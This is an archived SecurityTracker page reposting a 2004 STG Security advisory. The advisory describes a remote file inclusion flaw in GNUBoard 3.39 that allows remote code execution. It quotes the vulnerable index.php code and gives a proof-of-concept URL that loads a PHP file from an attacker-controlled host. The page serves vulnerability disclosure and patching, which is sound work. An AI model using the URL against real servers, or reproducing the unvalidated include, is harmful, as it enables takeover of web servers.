SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   GNUBoard Vendors:   SIR
GNUBoard Include File Error Lets Remote Users Execute Arbitrary Commands
SecurityTracker Alert ID:  1012531
SecurityTracker URL:  http://securitytracker.com/id/1012531
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Dec 15 2004
Impact:   Execution of arbitrary code via network, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 3.39 and prior versions
Description:   STG Security reported an include file vulnerability in GNUBoard. A remote user can execute arbitrary code on the target system.

It is reported that if register_globals is on in the 'php.ini' file, then a remote user can request a specially crafted URL to cause arbitrary PHP code from a remote site to be included and executed by the target system. The code, including operating system commands, will run with the privileges of the target web service.

The 'index.php' script does not properly validate user-supplied input in the 'doc' parameter.

A demonstration exploit URL is provided:

http://[target]/gnu3/index.php?doc=http://[attacker]/[attack].php

The vendor was notified on December 6, 2004.

Jeremy Bae at STG Security is credited with discovering this flaw.

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:   The vendor has issued a fixed version (3.40), available at:

http://sir.co.kr/?doc=bbs/gnuboard.php&bo_table=pds&page=1&wr_id=1871

Vendor URL:  www.sir.co.kr/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  STG Security Advisory: [SSA-20041214-14] GNUBoard PHP injection vulnerability


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

STG Security Advisory: [SSA-20041214-14] GNUBoard PHP injection
vulnerability.

Revision 1.0
Date Published: 2004-12-14 (KST)
Last Update: 2004-12-14
Disclosed by SSR Team (advisory@stgsecurity.com)

Summary
========
GNUBoard is one of widely used web BBS applications in Korea. Because of an
input validation flaw, a malicious attack can run arbitrary commands with
the privilege of the HTTPD process, which is typically run as the nobody
user.

Vulnerability Class
===================
Implementation Error: Input validation flaw

Impact
======
High : arbitrary command execution.

Affected Products
================
GNUBoard 3.39 and prior versions
php.ini : register_globals = On

Vendor Status: FIXED
====================
2004-12-06 Vulnerability found.
2004-12-06 GNUBoard developer notified.
2004-12-06 GNUBoard 3.40 is released.
2004-12-14 Official release.

Details
=======
For improper verification of input value of the parameter, the "doc"
parameter in "index.php" can be exploited to include arbitrary files of
external or local resources to execute arbitary commands.

index.php
- - ----
if (!$doc) {  (1) <-- check point
    $doc = './main.php';
}

// php ??? ??? ??? ? ??
$tmp = explode(".", $doc);
$extension = $tmp[count($tmp)-1];
if (!preg_match("/^(php[3]?|[p]?htm[l]?)$/i", $extension) || count($tmp)<=1)
{
    echo "php php3 htm html phtml ??? ??? ? ????.";
    exit;
}
......
ob_start();
include $doc; (2) <-- include point
- - ----

Proof of concept :
http://[victim]/gnu3/index.php?doc=http://[attacker]/[attack].php

Solution
=========
Update to 3.40
http://sir.co.kr/?doc=bbs/gnuboard.php&bo_table=pds&page=1&wr_id=1871

Vendor URL
==========
http://www.sir.co.kr/

Credits
======
Jeremy Bae at STG Security

-----BEGIN PGP SIGNATURE-----
Version: PGP 8.0

iQA/AwUBQcAR6j9dVHd/hpsuEQJapACg1dVMXa7JIQE106S6zHRa/CoXM1YAoKwz
Eay4eAl41ONg1Db1HI4ZRdqY
=7l/U
-----END PGP SIGNATURE-----
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC